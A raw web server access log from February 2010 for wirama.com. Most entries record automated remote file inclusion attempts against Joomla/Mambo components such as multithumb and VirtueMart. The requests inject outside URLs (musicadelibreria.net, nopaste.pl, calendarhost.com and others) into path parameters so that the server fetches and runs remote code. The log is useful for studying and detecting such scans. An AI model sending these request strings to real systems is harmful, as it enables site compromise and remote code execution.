118.217.5.166 - - [01/Feb/2010:01:52:56 -0800] "GET /logs/access_090329.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:52:56 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:52:56 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:53:32 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:53:32 -0800] "GET /logs/access_090329.log%20%20//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:01:53:32 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:54:43 -0800] "GET /logs/access_091031.log//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:54:44 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
193.28.184.15 - - [01/Feb/2010:01:54:44 -0800] "GET /logs//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3946 "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:01:58:29 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:01:58:29 -0800] "GET /logs/access_090331.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:01:58:29 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:01:58:31 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:01:58:31 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:01:58:31 -0800] "GET /logs/access_090331.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:01:58:31 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:01:58:31 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:01:58:31 -0800] "GET /logs/access_090331.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:01:58:46 -0800] "GET /logs/access_090330.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:01:58:48 -0800] "GET /logs/access_090330.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:01:58:53 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:01:58:53 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:01:58:53 -0800] "GET /logs/access_090330.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:01:58:56 -0800] "GET /logs/access_090330.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:01:59:36 -0800] "GET /logs/access_090731.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:01:59:46 -0800] "GET /logs/access_090731.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:02:26 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:02:26 -0800] "GET /logs/access_090601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:02:26 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:02:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:02:32 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:02:35 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:02:35 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:02:39 -0800] "GET /logs/access_090601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:02:02:55 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:02:55 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:02:55 -0800] "GET /logs/access_090330.log%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:03:06 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:03:06 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:03:06 -0800] "GET /logs/access_090330.log%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:03:08 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:03:08 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:03:08 -0800] "GET /logs/access_090330.log%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:02:03:09 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:02:03:09 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:02:03:09 -0800] "GET /logs/access_090331.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
174.37.162.130 - - [01/Feb/2010:02:03:12 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:03:12 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:03:12 -0800] "GET /logs/access_090330.log%20%20//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.195.112.29 - - [01/Feb/2010:02:03:15 -0800] "GET /?S=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
118.217.5.166 - - [01/Feb/2010:02:04:00 -0800] "GET /logs/access_090601.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:04:01 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:04:24 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:04:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:04:24 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:04:27 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:02:04:43 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:02:04:43 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:02:04:59 -0800] "GET /logs/access_090331.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:05:30 -0800] "GET /logs/access_090601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.106.208 - - [01/Feb/2010:02:05:41 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
118.217.5.166 - - [01/Feb/2010:02:05:51 -0800] "GET /logs/access_090601.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.106.208 - - [01/Feb/2010:02:06:32 -0800] "GET /?N=D HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
118.217.5.166 - - [01/Feb/2010:02:06:47 -0800] "GET /image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:02:06:47 -0800] "GET /logs/access_090331.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
118.217.5.166 - - [01/Feb/2010:02:06:47 -0800] "GET /logs//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:07:06 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:07:06 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:07:06 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:02:07:09 -0800] "GET /logs/access_090601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bookmarketingworks.com/css/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
193.19.177.19 - - [01/Feb/2010:02:07:24 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.19.177.19 - - [01/Feb/2010:02:07:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
118.217.5.166 - - [01/Feb/2010:02:07:44 -0800] "GET /logs/access_090601.log//image_upload.php?sbp=http://scc.surat.psu.ac.th/web52/components/com_extcalendar/ikhy1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.195.112.29 - - [01/Feb/2010:02:08:41 -0800] "GET /?S=D HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:11:32 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:11:32 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:11:32 -0800] "GET /logs/access_090801.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:11:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:11:39 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:11:39 -0800] "GET /logs/access_090801.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:11:57 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:11:57 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:11:57 -0800] "GET /logs/access_090801.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.26.199.126 - - [01/Feb/2010:02:12:02 -0800] "GET /logs/access_091101.log///?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.26.199.126 - - [01/Feb/2010:02:12:02 -0800] "GET //?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
72.26.199.126 - - [01/Feb/2010:02:12:02 -0800] "GET /logs///?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 200 3947 "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:12:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:12:11 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:02:12:11 -0800] "GET /logs/access_090801.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.26.199.126 - - [01/Feb/2010:02:12:19 -0800] "GET /logs/access_091101.log///?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.26.199.126 - - [01/Feb/2010:02:12:19 -0800] "GET /logs///?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 200 3947 "-" "Mozilla/5.0" "www.wirama.com"
72.26.199.126 - - [01/Feb/2010:02:12:19 -0800] "GET //?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
193.19.177.19 - - [01/Feb/2010:02:14:35 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
193.19.177.19 - - [01/Feb/2010:02:14:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "wirama.com"
72.26.199.126 - - [01/Feb/2010:02:14:37 -0800] "GET /logs/access_091101.log///?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.26.199.126 - - [01/Feb/2010:02:14:37 -0800] "GET //?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
72.26.199.126 - - [01/Feb/2010:02:14:37 -0800] "GET /logs///?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 200 3947 "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:02:14:38 -0800] "GET /administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
81.3.150.104 - - [01/Feb/2010:02:14:39 -0800] "GET /logs//administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
81.3.150.104 - - [01/Feb/2010:02:14:39 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
81.3.150.104 - - [01/Feb/2010:02:14:46 -0800] "GET /administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
81.3.150.104 - - [01/Feb/2010:02:14:46 -0800] "GET /logs//administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
81.3.150.104 - - [01/Feb/2010:02:14:46 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.26.199.126 - - [01/Feb/2010:02:14:49 -0800] "GET /logs/access_091101.log///?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.26.199.126 - - [01/Feb/2010:02:14:49 -0800] "GET //?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
72.26.199.126 - - [01/Feb/2010:02:14:49 -0800] "GET /logs///?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 200 3947 "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:02:15:03 -0800] "GET /logs//administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
81.3.150.104 - - [01/Feb/2010:02:15:03 -0800] "GET /administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
81.3.150.104 - - [01/Feb/2010:02:15:03 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
81.3.150.104 - - [01/Feb/2010:02:15:05 -0800] "GET /logs//administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
81.3.150.104 - - [01/Feb/2010:02:15:05 -0800] "GET /administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
81.3.150.104 - - [01/Feb/2010:02:15:05 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.26.199.126 - - [01/Feb/2010:02:15:10 -0800] "GET /logs/access_090731.log///?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.26.199.126 - - [01/Feb/2010:02:15:24 -0800] "GET /logs/access_090731.log///?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:02:16:24 -0800] "GET /administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:02:16:24 -0800] "GET /logs//administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:02:16:24 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:02:16:24 -0800] "GET /administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:02:16:24 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:02:16:24 -0800] "GET /logs//administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:02:16:41 -0800] "GET /logs/access_100101.log//administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
81.3.150.104 - - [01/Feb/2010:02:16:41 -0800] "GET /logs/access_100101.log//administrator/components/com_virtuemart/notify.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
